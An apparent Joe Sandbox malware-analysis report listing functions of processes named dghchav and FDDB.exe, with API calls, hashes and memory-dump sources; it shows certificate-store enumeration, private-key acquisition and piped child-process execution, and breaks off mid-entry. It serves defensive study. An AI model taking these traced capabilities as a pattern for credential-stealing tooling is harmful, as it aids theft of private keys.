Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e0000_dghchav.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: cea14cca2211f37e0d6e011ac58af5d885f71300399aca2e74a7d4b784c7d1e3
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 0FD0123114512877D7002A95DC09BCD7F1CDF05B62F008421FB0DD9080C7B0994046E5

Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dghchav.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dghchav.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dghchav.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dghchav.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Function 0076F106 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0076F157

Memory Dump Source

Source File: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75d000_dghchav.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: d7e91e5c4eeaf59ac62e6352dbb0939a18377191d603fe608ab9453a9db3d52d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: D6113C79A00208EFDB01DF98CA85E99BFF5AF08350F1580A4F9489B362D775EA50DF80

Analysis Process: FDDB.exePID: 3720, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	22.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	38.3%
Total number of Nodes:	849
Total number of Limit Nodes:	32

Executed Functions

Function 00007FF6DFE29224 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 158
synchronizationtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6DFE2924D

Part of subcall function 00007FF6DFE225DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21985,?,?,?,00007FF6DFE2155F), ref: 00007FF6DFE225E5

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6DFE293AB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6DFE293C0
TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6DFE293EF

Part of subcall function 00007FF6DFE2968C: PeekNamedPipe.KERNELBASE ref: 00007FF6DFE296B8

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6DFE29421
GetExitCodeProcess.KERNELBASE ref: 00007FF6DFE29460

Strings

& echo , xrefs: 00007FF6DFE292BF

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
String ID: & echo
API String ID: 2711250446-3491486023
Opcode ID: e1a57332913e15c3beaf25be37e5f59387cb859b354fc8ccef40118164e5a1d9
Instruction ID: 2b15553715e696942b8edd41ca926d65e258bb26c4d321d50eb2fac753213681
Opcode Fuzzy Hash: e1a57332913e15c3beaf25be37e5f59387cb859b354fc8ccef40118164e5a1d9
Instruction Fuzzy Hash: 4C513B21A09643A1EE30DB62E4952BE6391FFC5B84F446037CE4EC7A95EE7EE455D300

Function 00007FF6DFE27138 Relevance: 4.5, APIs: 3, Instructions: 38
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DFE27503), ref: 00007FF6DFE2714F
CoInitializeSecurity.COMBASE ref: 00007FF6DFE271B6
CoCreateInstance.COMBASE ref: 00007FF6DFE271D3

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Initialize$CreateInstanceSecurity
String ID:
API String ID: 89549506-0
Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
Instruction ID: 889bbb170be49696077d6ff5e82fda32f361787300a8133618924174d1b608d2
Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
Instruction Fuzzy Hash: F0118873A28640DAF3108F61E8593AE7774F38870DF608219EA496A998CF3CD255CB84

Function 00007FF6DFE29AC8 Relevance: 4.4, Strings: 3, Instructions: 664
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

's)s, xrefs: 00007FF6DFE29B11
sDs, xrefs: 00007FF6DFE29B1B
?: ', xrefs: 00007FF6DFE2A3F6

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID:
String ID: sDs$'s)s$?: '
API String ID: 0-2673205255
Opcode ID: 738f978cd6ad19bdb082bcf6a84014457167de0e7706548bc7d5ddc08a66e7e6
Instruction ID: 61ec33365bb7bda9e6b6fe2ada5246f93b1c88d0908131feebcff1e7f24bf6f8
Opcode Fuzzy Hash: 738f978cd6ad19bdb082bcf6a84014457167de0e7706548bc7d5ddc08a66e7e6
Instruction Fuzzy Hash: 9C525362F0578269EB20DFB194151FD27A26B867C8F445036DE4DABB8BEE3ED125C340

Function 00007FF6DFE22654 Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21951,?,?,00000000,00007FF6DFE219BA), ref: 00007FF6DFE22669
RtlReAllocateHeap.NTDLL(?,?,?,00007FF6DFE21951,?,?,00000000,00007FF6DFE219BA), ref: 00007FF6DFE2267A

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: bc09a8f51c988994e8a976bfcc15b65bca753258698eea1a68c770aa776c35ff
Instruction ID: b40f96d83f70ad165a09db4251797cec7c513e54313fe8899688643c8e8a241d
Opcode Fuzzy Hash: bc09a8f51c988994e8a976bfcc15b65bca753258698eea1a68c770aa776c35ff
Instruction Fuzzy Hash: E0E08615E08587A1F9189B92F95407D5361AFC9BC1F48C036DD0E87755DD2DD4654600

Function 00007FF6DFE22D5C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 253
encryptiontimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6DFE22D90
CertGetNameStringW.CRYPT32 ref: 00007FF6DFE22DD3
CertNameToStrW.CRYPT32 ref: 00007FF6DFE22EB8
CertNameToStrW.CRYPT32 ref: 00007FF6DFE22F0A
FileTimeToSystemTime.KERNEL32 ref: 00007FF6DFE22F4B
FileTimeToSystemTime.KERNEL32 ref: 00007FF6DFE22FC1

Part of subcall function 00007FF6DFE21A70: wvsprintfW.USER32 ref: 00007FF6DFE21AA9

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6DFE23178

Part of subcall function 00007FF6DFE23220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE2325E
Part of subcall function 00007FF6DFE23220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6DFE2328D
Part of subcall function 00007FF6DFE23220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE232BB
Part of subcall function 00007FF6DFE23220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23336
Part of subcall function 00007FF6DFE23220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23380
Part of subcall function 00007FF6DFE23220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE233AC

Strings

1.2.840.113549, xrefs: 00007FF6DFE2305F, 00007FF6DFE2306F

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
String ID: 1.2.840.113549
API String ID: 2787208766-3888290641
Opcode ID: a5052541921af31a92bb83a9905a4357149baaf2a43a2cd8acc9bc44617fdd92
Instruction ID: 8507f27f02b6115439e56edaa32baa998941ace4aa4cf718b642bf0462b2e35c
Opcode Fuzzy Hash: a5052541921af31a92bb83a9905a4357149baaf2a43a2cd8acc9bc44617fdd92
Instruction Fuzzy Hash: A5B1C462A08642A5E760DF22D4402BEA3A1FBC5BC4F404037EE8D87B69EF3DD125CB40

Function 00007FF6DFE2900C Relevance: 13.6, APIs: 9, Instructions: 137
pipeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePipe.KERNELBASE ref: 00007FF6DFE2905F
GetLastError.KERNEL32 ref: 00007FF6DFE2907D
CreatePipe.KERNELBASE ref: 00007FF6DFE290B7
GetLastError.KERNEL32 ref: 00007FF6DFE290D5
CreatePipe.KERNELBASE ref: 00007FF6DFE290FC
GetLastError.KERNEL32 ref: 00007FF6DFE2911A
CreateProcessW.KERNELBASE ref: 00007FF6DFE291B7
GetLastError.KERNEL32 ref: 00007FF6DFE291DF
CloseHandle.KERNEL32 ref: 00007FF6DFE291F9

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: CreateErrorLast$Pipe$CloseHandleProcess
String ID:
API String ID: 2620922840-0
Opcode ID: aaa0612b3fd30c93b4769d3853684a8ad1b8f30a6c0de2de8c6a0fef772f0667
Instruction ID: d397d0af0ada2726e84bb6a2ca69e0d2971ac9d395039cf45240ad84ec138aba
Opcode Fuzzy Hash: aaa0612b3fd30c93b4769d3853684a8ad1b8f30a6c0de2de8c6a0fef772f0667
Instruction Fuzzy Hash: A8515F32B08A46A9FB20DF71D4847ED23A1ABD9788F414036DE0DD7A99EE3DD159C340

Function 00007FF6DFE22BAC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertOpenStore.CRYPT32 ref: 00007FF6DFE22C16
CertCloseStore.CRYPT32 ref: 00007FF6DFE22CC2

Part of subcall function 00007FF6DFE22D5C: CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6DFE22D90
Part of subcall function 00007FF6DFE22D5C: CertGetNameStringW.CRYPT32 ref: 00007FF6DFE22DD3
Part of subcall function 00007FF6DFE22D5C: CertNameToStrW.CRYPT32 ref: 00007FF6DFE22EB8
Part of subcall function 00007FF6DFE22D5C: CertNameToStrW.CRYPT32 ref: 00007FF6DFE22F0A

Strings

*sms, xrefs: 00007FF6DFE22C88
zszs, xrefs: 00007FF6DFE22C5E
gszs, xrefs: 00007FF6DFE22C6B

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Cert$NameStore$CertificatesCloseEnumOpenString
String ID: *sms$gszs$zszs
API String ID: 3617724111-4219868587
Opcode ID: 185f5889c02d33174366d98b6c19ba59845491b568fd27e41f5e9029496b6ffa
Instruction ID: 1c303f34ab36e62646c40c7226a230d828eec5a7aad551f94cfd6c7d798207fb
Opcode Fuzzy Hash: 185f5889c02d33174366d98b6c19ba59845491b568fd27e41f5e9029496b6ffa
Instruction Fuzzy Hash: E621B672A18682A1EB60DF16E4152AE6361FBC5B80F449036EE8EC7769EF3DD514CB40

Function 00007FF6DFE22B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertEnumSystemStore.CRYPT32 ref: 00007FF6DFE22B7F

Strings

":{, xrefs: 00007FF6DFE22B4D
"_":"", xrefs: 00007FF6DFE22B5C

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: CertEnumStoreSystem
String ID: ":{$"_":""
API String ID: 4132996702-2026347918
Opcode ID: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
Instruction ID: 05b8a6e1986236fcf81c0e94994d7433c2c46e77e92e85663125375d15c6f487
Opcode Fuzzy Hash: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
Instruction Fuzzy Hash: 25016D21E08A4271FA14DB56E4440BD6395AFC9BC5F489037ED5DC777ADF2CD6628700

Function 00007FF6DFE231C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertEnumSystemStoreLocation.CRYPT32 ref: 00007FF6DFE23200

Strings

"_": "", xrefs: 00007FF6DFE231E2

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: CertEnumLocationStoreSystem
String ID: "_": ""
API String ID: 863500693-1453221996
Opcode ID: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
Instruction ID: 93702a1d07aff5dc677c0e2e34156a2cd378c76a85bd16aca57ac1beca8f7ca0
Opcode Fuzzy Hash: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
Instruction Fuzzy Hash: 83E06D51F1850370EE54AB62E8550FC53556FC97C1F882037EC1EC6376ED2DD1A98300

Function 00007FF6DFE2968C Relevance: 3.0, APIs: 2, Instructions: 42
filepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekNamedPipe.KERNELBASE ref: 00007FF6DFE296B8
ReadFile.KERNELBASE ref: 00007FF6DFE296F7

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: FileNamedPeekPipeRead
String ID:
API String ID: 327342812-0
Opcode ID: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
Instruction ID: 72e6fd0d4e3bdf5348fadfd52bdd40459e34f29a0e9cab07141f57b904fcc5b8
Opcode Fuzzy Hash: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
Instruction Fuzzy Hash: B4016D22B1864293E7608B56E40477EA3A1FBC5BD8F144135DA48CB654EFBDD4548B40

Function 00007FF6DFE295A0 Relevance: 3.0, APIs: 2, Instructions: 39
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,?,00007344,00007FF6DFE29B7C), ref: 00007FF6DFE295B6
GetExitCodeProcess.KERNELBASE ref: 00007FF6DFE295F6

Part of subcall function 00007FF6DFE2968C: PeekNamedPipe.KERNELBASE ref: 00007FF6DFE296B8

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
String ID:
API String ID: 2021502500-0
Opcode ID: 8118cb50f4080a30a6e6e506748c6a61c7a035189441b92ba572f26101741018
Instruction ID: 96ebc246cc217dc1f698476336303d3df437766032d3510fc4bc9a87b35454df
Opcode Fuzzy Hash: 8118cb50f4080a30a6e6e506748c6a61c7a035189441b92ba572f26101741018
Instruction Fuzzy Hash: 08012922A08647A2EF608F21D49437D23A1FFC4B8CF186536CA0DC6599EF6EDCA5D300

Function 00007FF6DFE225B4 Relevance: 3.0, APIs: 2, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
Instruction ID: 8fcef5169e86ff8429b3b215528f7bb205cacd3f8033c7f8898c351d439af6ef
Opcode Fuzzy Hash: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
Instruction Fuzzy Hash: BDC01244E0660262FE2897E368180B943916FDAB82B088036CD0A86761DE2D51F54200

Function 00007FF6DFE21A70 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wvsprintfW.USER32 ref: 00007FF6DFE21AA9

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: wvsprintf
String ID:
API String ID: 2795597889-0
Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
Instruction ID: c13561a0b5beebec7a982fd041560930bebb951a787c686ace5b97fedc023c1a
Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
